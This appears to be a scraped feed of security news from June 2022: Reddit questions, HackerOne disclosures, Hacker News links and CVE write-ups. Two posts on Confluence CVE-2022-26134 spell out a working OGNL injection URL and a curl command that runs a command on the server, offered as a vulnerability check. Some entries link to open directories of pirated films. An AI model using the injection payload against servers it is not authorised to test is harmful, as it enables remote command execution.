    I posted in /r/CrowdStrike about using Real Time Response to perform forensics. TL;DR While CrowdStrike offers Falcon Forensics, some organizations have not purchased it. I have seen a post mentioning KAPE, Kansa and PowerForensics. However, both the Kansa and PowerForensics projects seem to be unmaintained. Additionally, there were concerns about using KAPE as it could over-write memory, HDD space, etc. For Falcon Forensics, an EXE has to be copied (if not already present on the endpoint) and executed. Couldn't that over-write memory, HDD space, etc. as well? I am digging into the KAPE docs now and comparing the capabilities of Falcon Forensics to KAPE. What are folks using these days for remote forensics against live systems? Do you agree about the over-writing concerns? TIA Kevin submitted by /u/kevinelwell [link] [comments]
    Anatomy of an NTFS FILE Record - Windows File System Forensics
    Good morning, It’s time for a new 13Cubed episode! In this one, we’ll talk about the structure and composition of an NTFS FILE record. Then, we'll take a look at a sample record for a resident file and learn how to manually extract the important attributes. Note that there is also an accompanying cheat sheet which may come in handy (see the video’s description)! Episode: https://www.youtube.com/watch?v=l4IphrAjzeY Episode Guide: https://www.13cubed.com/episodes/ 13Cubed YouTube Channel: https://www.youtube.com/13cubed 13Cubed Patreon (Help support the channel and get early access to content and other perks!): https://www.patreon.com/13cubed submitted by /u/13Cubed [link] [comments]
  • Open

    Dreamcast Games and Movies. Yes, people are still making new movies playable on Dreamcast.
    submitted by /u/RealAGB [link] [comments]
    Older Movies and TV - Mostly Horror
    https://movies.encrypticmh.appboxes.co/ https://tv.encrypticmh.appboxes.co/ submitted by /u/sy029 [link] [comments]
    cow breeds
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
  • Open

    GALLIUM Expands Targeting Across Telecommunications, Government and Finance Sectors With New PingPull Tool
    A new, difficult-to-detect remote access trojan named PingPull is being used by GALLIUM, an advanced persistent threat (APT) group. The post GALLIUM Expands Targeting Across Telecommunications, Government and Finance Sectors With New PingPull Tool appeared first on Unit 42.
  • Open

    lack of rate limit on athentification login page & forgot password page
    Showmax disclosed a bug submitted by saidkira: https://hackerone.com/reports/1591764
  • Open

    NTLM Authentication in Active Directory
    No content preview
    How to get started in Cybersecurity in 2022
    No content preview
  • Open

    NTLM Authentication in Active Directory
    No content preview
    How to get started in Cybersecurity in 2022
    No content preview
  • Open

    NTLM Authentication in Active Directory
    No content preview
    How to get started in Cybersecurity in 2022
    No content preview
  • Open

    聊下最近的 CVE-2022-30190
    作者:heige@知道创宇404实验室 原文链接:https://mp.weixin.qq.com/s/tb0K-qLcZo-9OeW3KsIrTg 最近曝光的在野0day挺多的,看起来又为今年的年终的总结提供不少弹药,看到这个漏洞我在朋友圈里简单评论下: CVE-2022-30190 (Follina) 这个漏洞在我的标准里可以算是"神洞"了,品相远比CVE-2021-40444要高。每...
  • Open

    聊下最近的 CVE-2022-30190
    作者:heige@知道创宇404实验室 原文链接:https://mp.weixin.qq.com/s/tb0K-qLcZo-9OeW3KsIrTg 最近曝光的在野0day挺多的,看起来又为今年的年终的总结提供不少弹药,看到这个漏洞我在朋友圈里简单评论下: CVE-2022-30190 (Follina) 这个漏洞在我的标准里可以算是"神洞"了,品相远比CVE-2021-40444要高。每...

  • Open

    Best approach to start mobile (Android/iOS) exploit dev ?
    Hello, Im thinking about a career in mobile (Android/iOS, especially Android) security research and i would like to know what is the best way to go for it, in terms of methodology and best resources to learn from. I do have some experience with x86 Assembly and programming languages (mostly high level like C#, Dart and all with some experience in C++ for software development). I would appreciate any suggestions, thank you very much in advance! submitted by /u/Ankhyx [link] [comments]
  • Open

    How to Check Google Doc for when spesific entries was made?
    I dont have Editing permissions or anything like that. ​ Is there any way to find out when a certain Entry was made? I only have the downloaded file. ​ I am trying to prove it was edited after a spesific date submitted by /u/tirehu [link] [comments]
    How can I tell if a document has come straight from the official source or if it has been opened and edited off that official site? I
    How can I tell if a document has come straight from the official source or if it has been opened and edited off that official site? I already know I have a document that has been tampered with because I was able to get the originals. Today I opened both of them up on my laptop through Google docs and the authentic one opened up and looks exactly the same. And the altered one when opened up I noticed it opened up in a different layout. The text isn’t the same size, some of the text is yellow, some of the letters like the “s” is changed to a $ sign. Does this show more proof that they were altered, I’m guessing on a computer not associated with the official place. I am not a computer person, but I remember professors saying how they can put your papers in something and it will show if parts are copied and pasted or plagiarized or whatever. So did I just discover more evidence that backs up on a tech level that these documents were altered after being received off of the original source? submitted by /u/Antique-Dark-907 [link] [comments]
  • Open

    Professional advice needed
    Utilizing my college years Hello all, I have recently just finished my first year of undergrad at UOregon, while being a Computer Science major. I have a strong interest in cybersecurity and went into this school hoping to find more opportunities to indulge in cybersec-like activities. At the beginning of the school year, I ended up landing a IT tech/helpdesk position at my school as well. A few months later, I landed a position at the cybersecurity office here at the school. So, I am currently working as a Student IT technician, and a Student Security Analyst. I plan on working the IT job thru summer 2022, and then quitting; to increase my hours at the analyst position. I plan on staying in that position until I graduate. Tis position also offers assistance and guidance towards certifications. I plan on getting my Network+ this summer, and then Security+ sometime in 2023. After I graduate I will have just about four years of experience within the cybersecurity dept. at my school. On another note, I am doing a good amount of home study as well, and really trying to push my python skills to the next level. What I am really trying to do, and will be my goal until I graduate, is to put myself in the best position, and set myself up as much as possible, to be able to land a great job once I graduate. The reason I am posting, is to ask more experienced personnel, what more can I do to set myself up for a great career? I feel like I am on a good track at the moment, but I want to fully utilize the next 3 years I have in college. Thank you for reading! P.S. may be posting in other places, sorry for the spam if I end up doing so. submitted by /u/Straight_Bid_5577 [link] [comments]
    Wi-Fi malware
    I don’t know if this is the right place to ask. If it’s not, tell me where I should write it, thank you. My question may seem stupid but: I accidentally connected to a Wi-Fi which I’ve never seen before (and haven’t ever seen after I disconnected). The Wi-Fi network was apparently one of my neighbor’s network, but again, never seen that wifi before and after. The Wi-Fi network had no password, I immediately disconnected, like in 5-10 seconds. Is it possible to get any malware or other kinds of unwanted software, spyware, adware through that WiFi connection? Thank you, and again, if this is a wrong place to ask about it, let me know. submitted by /u/mesropmashtots [link] [comments]
    A question for full time pen testers
    All of these ctf’s and junk really seem to get crazy about using gobuster or dirbuster, do any of you, full time pen testers that have been doing this for a while ever actually feel the need to use this? Now granted most of my experience is net pen not web app, but wanted to get a consensus from more people. submitted by /u/networkalchemy [link] [comments]
  • Open

    Vulnerability During Transition
    Article URL: https://biggestfish.substack.com/p/vulnerability-during-transition Comments URL: https://news.ycombinator.com/item?id=31716383 Points: 2 # Comments: 0
    Exploration of the Dirty Pipe Vulnerability (CVE-2022-0847)
    Article URL: https://lolcads.github.io/posts/2022/06/dirty_pipe_cve_2022_0847/ Comments URL: https://news.ycombinator.com/item?id=31712986 Points: 42 # Comments: 1
  • Open

    Researcher defends Formidable in fight against ‘critical’ CVE assignment
    Article URL: https://portswigger.net/daily-swig/researcher-defends-formidable-in-fight-against-critical-cve-vulnerability-assignment Comments URL: https://news.ycombinator.com/item?id=31716274 Points: 2 # Comments: 0
    Exploration of the Dirty Pipe Vulnerability (CVE-2022-0847)
    Article URL: https://lolcads.github.io/posts/2022/06/dirty_pipe_cve_2022_0847/ Comments URL: https://news.ycombinator.com/item?id=31712986 Points: 42 # Comments: 1
  • Open

    I wrote a non technical post on my blog regarding security specialists, nihilistic behavior, and how to stay positive. Sometimes we need a reminder that, after all, things are not that bad.
    submitted by /u/last0x00 [link] [comments]
    A project for aspiring hackers to easily learn our craft
    submitted by /u/cr0mll [link] [comments]
    bevigil-cli : A handy tool to extract assets like subdomains, URL params, hosts, S3 buckets, URLs from android applications through BeVigil OSINT API with ease.
    submitted by /u/xscorp7 [link] [comments]
    NGINX security: Everything you may not need to know about NGINX error logs - complete guide
    submitted by /u/jwizq [link] [comments]
    I made a browser extension that spoofs your location data to match your VPN. It can also spoof your user agent.
    submitted by /u/z0ccc_z0ccc [link] [comments]
  • Open

    SecWiki News 2022-06-12 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-06-12 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    Learning More About YAML Deserialization
    Introduction Continue reading on InfoSec Write-ups »
    TryHackMe: LazyAdmin
    No content preview
  • Open

    Learning More About YAML Deserialization
    Introduction Continue reading on InfoSec Write-ups »
    TryHackMe: LazyAdmin
    No content preview
  • Open

    Learning More About YAML Deserialization
    Introduction Continue reading on InfoSec Write-ups »
    TryHackMe: LazyAdmin
    No content preview
  • Open

    Phoneinfoga- Wikipedia of Phone Numbers.
    The Wikipedia Of Phone Number…Read This Article To Know All The Information Of Your Phone Number, Its All PUBLIC!! Continue reading on Medium »
  • Open

    The Four V’s of Effective Cybersecurity Posture
    There are four critical angles to achieve optimal cyber defense: Visibility, verification, vigilance, and validation. Rapid development… Continue reading on Purple Team »

  • Open

    All user password hash can be seen from admin panel
    UPchieve disclosed a bug submitted by dark_haxor: https://hackerone.com/reports/1489892
    CVE-2022-30115: HSTS bypass via trailing dot
    Internet Bug Bounty disclosed a bug submitted by haxatron1: https://hackerone.com/reports/1565622 - Bounty: $2400
    CVE-2022-27780: percent-encoded path separator in URL host
    Internet Bug Bounty disclosed a bug submitted by haxatron1: https://hackerone.com/reports/1565619 - Bounty: $2400
    CVE-2022-27779: cookie for trailing dot TLD
    Internet Bug Bounty disclosed a bug submitted by haxatron1: https://hackerone.com/reports/1565615 - Bounty: $2400
    disclosure the live_analytics information of any livestream.
    TikTok disclosed a bug submitted by datph4m: https://hackerone.com/reports/1561299 - Bounty: $1000
    Email address disclosure via invite token validatiion
    TikTok disclosed a bug submitted by noob_but_cut3: https://hackerone.com/reports/1560072 - Bounty: $250
  • Open

    What is your experience with being a digital forensic investigator?
    I'm currently looking into this line of work and I wanted to know what it's like. I've seen some people have bad experiences while others recommend this job. submitted by /u/Late_Ranger5256 [link] [comments]
    FTK toolkit 6.3.1, software completely unusable during index and index merge
    Am I just some kind of moron, or is this software supposed to be 100% unusable for 15 straight hours while it does the initial index and then the index merge? Has FTK just turned into the ultimate billable hours machine? its 2 million items, this shouldnt really be taking this long right? submitted by /u/NinjaLion [link] [comments]
  • Open

    Binary Analysis with Strace
    submitted by /u/DLLCoolJ [link] [comments]
    OUs and GPOs and WMI Filters, Oh My!
    submitted by /u/5ub34x_ [link] [comments]
  • Open

    CREST CRT exam prep?
    I'm well on my way with studying for my CPSA. Any advice on any labs tryhackme rooms/paths or hackthebox boxes, that I should be concentrating on for CRT exam? any advice appreciated. submitted by /u/Snoo77500 [link] [comments]
    SlowLoris mitigation on SSH
    Hi I know SlowLoris typically runs over HTTP, but for an assignment I had to run a SlowLoris over SSH instead over HTTP and had to find ways to mitigate the attack. The usual answer you find for a standard slowlorris attack is that you should use nginx, but even then there was conflicting information on the web. I tried to mitigate the attack over ssh with a simple iptables rule, but apparently there are more ways to stop this style of attack. Especially if it is a distributed attack, where iptables not really would work. I tried to find a way to check for especially longlasting or slow connections but did not find any good resources. How would you protect a system against such an attack? submitted by /u/curkus [link] [comments]
    How to use Chromium web developer tools to change the HTML and bypass to gain admin panel access?
    Hello, I was told I should check at the HTML of the User Registration website (code at the bottom) to know how to do this. I think I should change this line of code: Admin Panel but I don't know how to change the HTML. Should I use Web developer tool for Chromium? I'm blocked with this for too long. Thanks for any help ​ CODE: Password Confirm password Admin Panel div class="btn-group"> Info Only possible if you have a special autorisation submitted by /u/Traditional_Bird_877 [link] [comments]
  • Open

    Timing from HackTheBox — Detailed Walkthrough
    No content preview
    [Bug Bounty] How I was able edit AWS’s files from file upload function?
    No content preview
  • Open

    Timing from HackTheBox — Detailed Walkthrough
    No content preview
    [Bug Bounty] How I was able edit AWS’s files from file upload function?
    No content preview
  • Open

    Timing from HackTheBox — Detailed Walkthrough
    No content preview
    [Bug Bounty] How I was able edit AWS’s files from file upload function?
    No content preview
  • Open

    SecWiki News 2022-06-11 Review
    通过NPM生态系统中的依赖树揭开脆弱性传播及其演化的神秘面纱 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-06-11 Review
    通过NPM生态系统中的依赖树揭开脆弱性传播及其演化的神秘面纱 by ourren 更多最新文章,请访问SecWiki
  • Open

    Index of open FTP servers
    https://www.mmnt.net/ there are many ftp servers indexed, like https://www.mmnt.net/db/0/0/88.166.133.247/Public/Films%20&%20S%C3%A9ries , films you can download. submitted by /u/iams0rry [link] [comments]
  • Open

    First CTF — Tenable CTF 2022
    So this week I did a thing, joined Tenable CTF this year. So far its honestly showing me my weak points. I look forward to seeing if I can… Continue reading on Medium »
  • Open

    Exposing HelloXD Ransomware and x4k
    HelloXD is a ransomware family in its initial stages – but already seeking to impact organizations. We analyze samples and hunt for attribution. The post Exposing HelloXD Ransomware and x4k appeared first on Unit 42.

  • Open

    photos of old paintings
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
    Is it possible to explore hidden folders of open directories ?
    Sometime when you explore open directories by adding /storage /drive /disk at their top level of open directory index address you can enter and access to their kinda hidden directory which was not visible at their top level of open directory index ! ​ But it is kinda hard job to do it manually adding /storage1 /drive2 /disk3 etc... (as I am not even sure if that directories even exists) depends of directories but sometimes it exist ! ​ So I want to know if there are any tip to explore " the hidden directories that are not present at the top index level but which are actually accessible by maunally typing at address bar" ​ Thanks i n advance guys submitted by /u/Synchel [link] [comments]
  • Open

    Denial of Service Vulnerability in Envoy Proxy – CVE-2022-29225
    Article URL: https://jfrog.com/blog/denial-of-service-vulnerability-in-envoy-proxy-cve-2022-29225/ Comments URL: https://news.ycombinator.com/item?id=31700170 Points: 1 # Comments: 1
  • Open

    Denial of Service Vulnerability in Envoy Proxy – CVE-2022-29225
    Article URL: https://jfrog.com/blog/denial-of-service-vulnerability-in-envoy-proxy-cve-2022-29225/ Comments URL: https://news.ycombinator.com/item?id=31700170 Points: 1 # Comments: 1
    Apple M1 chip contains hardware vulnerability that bypasses memory defense
    Article URL: https://www.theregister.com/2022/06/10/apple_m1_pacman_flaw/ Comments URL: https://news.ycombinator.com/item?id=31696129 Points: 5 # Comments: 0
    Vulnerability in Gitlab: Sending Arbitrary Requests Through Jupyter Notebooks
    Article URL: https://liman.io/blog/gitlab-security-vulnerability-jupyter-notebooks Comments URL: https://news.ycombinator.com/item?id=31695949 Points: 3 # Comments: 0
    MIT Finds Apple M1 Vulnerability, Demos Pacman Attack
    Article URL: https://www.tomshardware.com/news/mit-finds-vulnerability-in-arm-chips-demos-pacman-attack-on-apple-m1 Comments URL: https://news.ycombinator.com/item?id=31693578 Points: 5 # Comments: 1
    Apple M1 Affected by Pacman Hardware Vulnerability in Arm Pointer Authentication
    Article URL: https://www.phoronix.com/scan.php?page=news_item&px=Apple-M1-PACMAN Comments URL: https://news.ycombinator.com/item?id=31692824 Points: 7 # Comments: 2
    Security Vulnerability in Gitlab: Sending Requests Through Jupyter Notebooks
    Article URL: https://liman.io/blog/gitlab-security-vulnerability-jupyter-notebooks Comments URL: https://news.ycombinator.com/item?id=31691130 Points: 1 # Comments: 0
  • Open

    password manager for IT department
    what is everyone using in their IT Department to share passwords? looking for something with MFA\yubikey. reading about dashlane and 1password and seems like in the past year I read that both are not what they used to be. bitwarden, some say it clunky, but seems well liked. really looking for something to sync to cloud, so we have offline access. submitted by /u/clarksavagejunior [link] [comments]
    Do Windows Defender detect follina?
    If it does what does it call it. Does MS have a different name for this attack or does it only detect the payload it tries to inject. submitted by /u/ThePorko [link] [comments]
    Broad subject, overwhelmed by choice of programming languages to focus on.
    Hi I'm a 2nd year Cybersecurity student and I am shooting for a career along the lines of pentesting, cybersec researcher, network engineer. I studied Python but, frankly, I sucked and I needed much more practice. At the same time I have a 3 month break of no studies where I wanna use this time to choose a language to learn. Cybersecurity is such a broad subject. Sometimes I can't see the forest through the trees. I need help on choosing where to focus my efforts. These are my choices: Learn C Learn (more)BASH Learn (more)Python As far as resources I have: Devices: A smart phone a busted laptop failing to run Kali Linux waitin for a fresh install and an Ubuntu desktop. Books: The Rootkit Arsenal by Bill Blunden Applied Cryptography: Protocols, algorithms and source code in C by Bruce Schneier Black Hat Python by Justin Seitz Online: Cisco Network Academy courses, networking essentials, cloud computing.. First year study materials for subjects on python coding, Linux shell, operating systems, hardware, OS architecture. A subscription to TryHackMe (offensive security path). I'd really appreciate your thoughts because I feel like I've got all this gear and all this motivation but...where to start, and which info will still be useful in 20 years? 50 years? submitted by /u/hobnobmatrixx [link] [comments]
  • Open

    bd-j exploit chain
    PlayStation disclosed a bug submitted by theflow0: https://hackerone.com/reports/1379975 - Bounty: $20000
    RXSS on
    U.S. Dept Of Defense disclosed a bug submitted by tmz900: https://hackerone.com/reports/1555582
  • Open

    SecWiki News 2022-06-10 Review
    针对解释性语言包管理器的供应链攻击研究 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-06-10 Review
    针对解释性语言包管理器的供应链攻击研究 by ourren 更多最新文章,请访问SecWiki
  • Open

    Brainpan 1 WriteUp Tryhackme
    No content preview
  • Open

    Brainpan 1 WriteUp Tryhackme
    No content preview
  • Open

    Brainpan 1 WriteUp Tryhackme
    No content preview
  • Open

    HP Server Raid
    I have got two HP servers (Z820 Workstation and a Proliant DLP360P Gen 8) these both have 4 x 10 TB disks inside. I cannot turn these on due to various reasons. I have used X-Ways to try and rebuild the RAID using the Level 5 Backward Delayed (HP)it showed there is a LVM2 container found a video online that shows you need to scan for the lost partitions which I done but did not bring back any results. I have also tried using RAID Reconstructor but is unable to tell me anything about the RAID settings which makes me believe it is a proprietary HP RAID Any suggestions in getting these RAID's rebuilt would be appreciated submitted by /u/ambitiousdonut94 [link] [comments]
  • Open

    CVE-2022-0540 Atlassian JIRA 存在认证绕过漏洞影响范围广泛
    作者:且听安全 原文链接:https://mp.weixin.qq.com/s/3EWju-IdsTfK7COKOK-c-w 漏洞信息 JIRA 存在 Seraph 组件认证绕过漏洞,影响范围广泛: 根据官方描述,大批量的默认和第三方插件受到影响: 关于Seraph Filter 对于认证绕过,猜测问题可能出现在 Filter 过滤上,JIRA 内部封装了数量较为庞大的 Filter 列...
    CVE-2022-1388 F5 BIG-IP iControl REST 处理进程分析与认证绕过漏洞复现
    作者:且听安全 原文链接:https://mp.weixin.qq.com/s/DR0RGE0lhBjBIF3TbDLhMw 漏洞信息 F5 BIG-IP是美国F5公司的一款集成了网络流量管理、应用程序安全管理、负载均衡等功能的应用交付平台。2022年5月4日,F5官方发布安全通告,修复了一个存在于BIG-IP iControl REST中的身份验证绕过漏洞。漏洞编号:CVE-2022-13...
  • Open

    CVE-2022-0540 Atlassian JIRA 存在认证绕过漏洞影响范围广泛
    作者:且听安全 原文链接:https://mp.weixin.qq.com/s/3EWju-IdsTfK7COKOK-c-w 漏洞信息 JIRA 存在 Seraph 组件认证绕过漏洞,影响范围广泛: 根据官方描述,大批量的默认和第三方插件受到影响: 关于Seraph Filter 对于认证绕过,猜测问题可能出现在 Filter 过滤上,JIRA 内部封装了数量较为庞大的 Filter 列...
    CVE-2022-1388 F5 BIG-IP iControl REST 处理进程分析与认证绕过漏洞复现
    作者:且听安全 原文链接:https://mp.weixin.qq.com/s/DR0RGE0lhBjBIF3TbDLhMw 漏洞信息 F5 BIG-IP是美国F5公司的一款集成了网络流量管理、应用程序安全管理、负载均衡等功能的应用交付平台。2022年5月4日,F5官方发布安全通告,修复了一个存在于BIG-IP iControl REST中的身份验证绕过漏洞。漏洞编号:CVE-2022-13...

  • Open

    Launching the PortSwigginar
    Thank you to those who attended our recent PortSwigginar on Burp Suite Enterprise Edition. Below is the video of the session, which included; A recap on “what’s new” within the tool for those who have
  • Open

    Launching the PortSwigginar
    Thank you to those who attended our recent PortSwigginar on Burp Suite Enterprise Edition. Below is the video of the session, which included; A recap on “what’s new” within the tool for those who have
  • Open

    Cyber Security Mind Map: Any ideas here useful?
    Does anyone think any of these ideas in green are worthwhile? Cyber Security Mind Map I'm looking for honest feedback. I just used the SCAMPER technique, along with this mind map to think of these ideas. For example, focusing on Anti-Malware with SCAMPER... I just went through some of the questions in the video for Substitute, Combine, Adapt, Modify, Purpose, and Rearrange to generate new ideas relating to Anti-Malware and other topics. My question is would any of the ideas described in the mind map be useful in preventing or detecting attacks? I haven't been able to get any feedback so far. :( submitted by /u/greyyit [link] [comments]
  • Open

    Magnet business strategy and pricing (Cyber?)
    What do you think about Magnet not including Email explorer feature in Non Cyber version of Axiom? https://www.magnetforensics.com/blog/reviewing-email-evidence-with-email-explorer-in-magnet-axiom-cyber/ It seems that they are starting to carve at features to force customers into Axiom Cyber. Axiom Cyber is 12K USD I think. As a reminder this is what we used to pay when they released Axiom 4 years ago. IEF: $3,625 AXIOM Computer: $3,800 AXIOM (Computer & Mobile): $5,600 Their spiel is that Cyber will be corporate and standard Axiom LEO oriented but I am not buying that. Love the software but they always played with the features being extra and then just charging more.. This was IEF comment I got at the Axiom release time: email quote: We rolled all the artifacts up into new IEF licenses so customers wouldn’t have to come back to us to buy any modules they may have forgot to include. More like we were forgetting to go deeper in the wallet so we made it mandatory... submitted by /u/Erminger [link] [comments]
    moto stylus
    Has anyone been able to get an image of this phone moto stylus ? I just need the call list if there is some way to obtain it. Thanks submitted by /u/JW4704 [link] [comments]
    Mount Navigation Device as Mass Storage instead of MTP
    Is there a way to sort of force-mount a navigation device (Garmin) as Mass Storage so I can pull a physical image? submitted by /u/visorov [link] [comments]
    Filesystem Imaging iOS
    Hello community … I’m trying to create dd image of filesystem for iOS 9.3.5 and 12 After ssh in the device, when trying to create dd … displays resource is busy … umount command also shows the partition is busy … How may I proceed to create the dd image or create tar ball … Any suggestions would be helpful submitted by /u/Aromatic_Ideal_2933 [link] [comments]
  • Open

    SecWiki News 2022-06-09 Review
    微软数据安全防护之Know Your Data by ourren 对数据安全的一些思考 by ourren 我所理解的安全运营 by adrain 从RSAC 2022创新沙盒看网安技术创新趋势 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-06-09 Review
    微软数据安全防护之Know Your Data by ourren 对数据安全的一些思考 by ourren 我所理解的安全运营 by adrain 从RSAC 2022创新沙盒看网安技术创新趋势 by ourren 更多最新文章,请访问SecWiki
  • Open

    WMI Providers for Script Kiddies
    Introduction So, this WMI stuff seems legit. Admins get a powerful tool which Script Kiddies can also use for profit. But there’s gotta be more, right? What if I want to take my WMI-fu to the next level? In the previous blog post, “WMI for Script Kiddies,” we described Windows Management Instrumentation (WMI). We detailed... The post WMI Providers for Script Kiddies appeared first on TrustedSec.
  • Open

    LockBit 2.0: How This RaaS Operates and How to Protect Against It
    LockBit 2.0 has so far been this year's most active ransomware gang on double-extortion leak sites. Learn about their tactics. The post LockBit 2.0: How This RaaS Operates and How to Protect Against It appeared first on Unit 42.
  • Open

    Moderator can enable cam/mic remotely if cam/mic-permission was disabled while user has activated cam/mic
    Nextcloud disclosed a bug submitted by michag86: https://hackerone.com/reports/1520685 - Bounty: $100
    Integer overflows in unescape_word()
    curl disclosed a bug submitted by ddme: https://hackerone.com/reports/1564922
    match
    curl disclosed a bug submitted by maslahhunter: https://hackerone.com/reports/1555440
  • Open

    Tesla NFC Key Card Security Vulnerability Demonstration
    Article URL: https://old.reddit.com/r/teslamotors/comments/v86pc1/tesla_nfc_key_card_security_vulnerability/ Comments URL: https://news.ycombinator.com/item?id=31680342 Points: 2 # Comments: 0
    Zero-Day Vulnerability in Atlassian Confluence
    On 2022-06-03, New zero-day Vulnerability occured. CVE-2022-26134 is one of command injection vulnerability. According to Report, a zero-day attack that began during the Memorial Day holiday in the United States and attacker could exploit this CVE-2022-26134 vulnerability to upload a webshell. You can see full report on this blog https://blog.criminalip.io/2022/06/05/criminal-ip-analysis-report-on-zero-day-vulnerability-in-atlassian-confluence/ . EDIT: Patch out: https://www.atlassian.com/software/confluence/download-archives If you are a Confluence user and you have access to Confluence through a browser on your PC, you can run the following command with a curl or python script to determine vulnerabilities of your Confluence server. Even if you are not an information security officer, there is a way to check vulnerabilities of your company’s Confluence. Try the following method and immediately request your security department for patches : https://your_confluence_address/${(#result=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(“id”).getInputStream(),”utf-8″)).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader(“X-Cmd-Response”,#result))}/ If you change the part of your Confluence address, you can check it with curl as follows. If the uid, gid, and group of the Confluence server are displayed in the X-Cmd-Response header value, this server is considered to have CVE-2022-26134 vulnerability. curl -v -k –head https://your_confluence_address/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22id%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/ | grep X-Cmd-Response Comments URL: https://news.ycombinator.com/item?id=31677086 Points: 17 # Comments: 6
  • Open

    CVE-2021-40444-Microsoft MSHTML 远程命令执行漏洞分析(三)
    作者:且听安全 原文链接:https://mp.weixin.qq.com/s/hHlscdLIvO0BY173ksq8vA 接上文: 第一部分:样本分析 CVE-2021-40444-Microsoft MSHTML远程命令执行漏洞分析(一) 第二部分:漏洞复现 CVE-2021-40444-Microsoft MSHTML远程命令执行漏洞分析(二) 本系列第三篇主要对漏洞成因和原理做...
    CVE-2021-40444-Microsoft MSHTML 远程命令执行漏洞分析(二)
    作者:且听安全 原文链接:https://mp.weixin.qq.com/s/q0lbegDjLViLI48N6RjGVw 接上文: 第一部分:样本分析 CVE-2021-40444-Microsoft MSHTML远程命令执行漏洞分析(一) 分析完网上流传的样本后,我准备尝试替换cab文件中的文件后复现漏洞。安装的office软件版本:Microsoft Word 2016 (16....
    CVE-2021-40444-Microsoft MSHTML 远程命令执行漏洞分析(一)
    作者:且听安全 原文链接:https://mp.weixin.qq.com/s/6q9fbggpkhd4PtwnghvZgg 漏洞概述 2021年9月8日,微软发布安全通告,披露了Microsoft MSHTML远程代码执行漏洞,攻击者可通过制作恶意的ActiveX控件供托管浏览器呈现引擎的 Microsoft Office文档使用,成功诱导用户打开恶意文档后,可在目标系统上以该用户权限执行...
  • Open

    CVE-2021-40444-Microsoft MSHTML 远程命令执行漏洞分析(三)
    作者:且听安全 原文链接:https://mp.weixin.qq.com/s/hHlscdLIvO0BY173ksq8vA 接上文: 第一部分:样本分析 CVE-2021-40444-Microsoft MSHTML远程命令执行漏洞分析(一) 第二部分:漏洞复现 CVE-2021-40444-Microsoft MSHTML远程命令执行漏洞分析(二) 本系列第三篇主要对漏洞成因和原理做...
    CVE-2021-40444-Microsoft MSHTML 远程命令执行漏洞分析(二)
    作者:且听安全 原文链接:https://mp.weixin.qq.com/s/q0lbegDjLViLI48N6RjGVw 接上文: 第一部分:样本分析 CVE-2021-40444-Microsoft MSHTML远程命令执行漏洞分析(一) 分析完网上流传的样本后,我准备尝试替换cab文件中的文件后复现漏洞。安装的office软件版本:Microsoft Word 2016 (16....
    CVE-2021-40444-Microsoft MSHTML 远程命令执行漏洞分析(一)
    作者:且听安全 原文链接:https://mp.weixin.qq.com/s/6q9fbggpkhd4PtwnghvZgg 漏洞概述 2021年9月8日,微软发布安全通告,披露了Microsoft MSHTML远程代码执行漏洞,攻击者可通过制作恶意的ActiveX控件供托管浏览器呈现引擎的 Microsoft Office文档使用,成功诱导用户打开恶意文档后,可在目标系统上以该用户权限执行...
  • Open

    Analysis report of Zero-day Vulnerability in Atlassian Confluence.
    On 2022-06-03, New zero-day Vulnerability occured. CVE-2022-26134 is one of command injection vulnerability. According to Report, a zero-day attack that began during the Memorial Day holiday in the United States and attacker could exploit this CVE-2022-26134 vulnerability to upload a webshell. You can see full report on this blog https://blog.criminalip.io/2022/06/05/criminal-ip-analysis-report-on-zero-day-vulnerability-in-atlassian-confluence/ . ​ https://preview.redd.it/uvzj6bb2ai491.png?width=933&format=png&auto=webp&s=1e4e10b5a3e71515abdc1d3de3dd2e5b0e7ed3d7 EDIT: Patch out: https://www.atlassian.com/software/confluence/download-archives If you are a Confluence user and you have access to Confluence through a browser on your PC, you can run the following command with a curl or python script to determine vulnerabilities of your Confluence server. Even if you are not an information security officer, there is a way to check vulnerabilities of your company’s Confluence. Try the following method and immediately request your security department for patches : https://your_confluence_address/${(#result=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(“id”).getInputStream(),”utf-8″)).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader(“X-Cmd-Response”,#result))}/ If you change the part of your Confluence address, you can check it with curl as follows. If the uid, gid, and group of the Confluence server are displayed in the X-Cmd-Response header value, this server is considered to have CVE-2022-26134 vulnerability. curl -v -k –head https://your_confluence_address/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22id%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/ | grep X-Cmd-Response submitted by /u/Late_Ice_9288 [link] [comments]

  • Open

    Active directory scripts for setting a lab?
    Are there any good resources or scripts etc... to build your own AD server to do some labs on? submitted by /u/networkalchemy [link] [comments]
    IAST that works with AWS Fargate and Lambda
    Hey everyone Does anyone have any recommendations for the IAST tool that may work with Fargate and Lambda? I've run a few DAST trials and none of them seems to work well with React.js SPAs. (Tannable, Probely, Detectify, etc) We have EKS(Fargate) for the customer-facing app and many smaller Lambda services with API Gateway. submitted by /u/greyeye77 [link] [comments]
  • Open

    Mostly newer US & UK movies & TV; some classics & grindhouse sprinkled in
    http://vod.simpletv.eu/media/storage/ submitted by /u/acidwashvideo [link] [comments]
  • Open

    Exploiting Amazon active vulnerability
    How to exploit an Amazon active vulnerability and get access to Prime (& all it’s benefits, including all Prime Video Channels) for FREE!… Continue reading on Medium »
    Setting Up Burp Suite
    Day 0: Recon Continue reading on Medium »
    Intigriti — XSS Challenge — May 2022 — Bug Bounty Hunting — Writeup
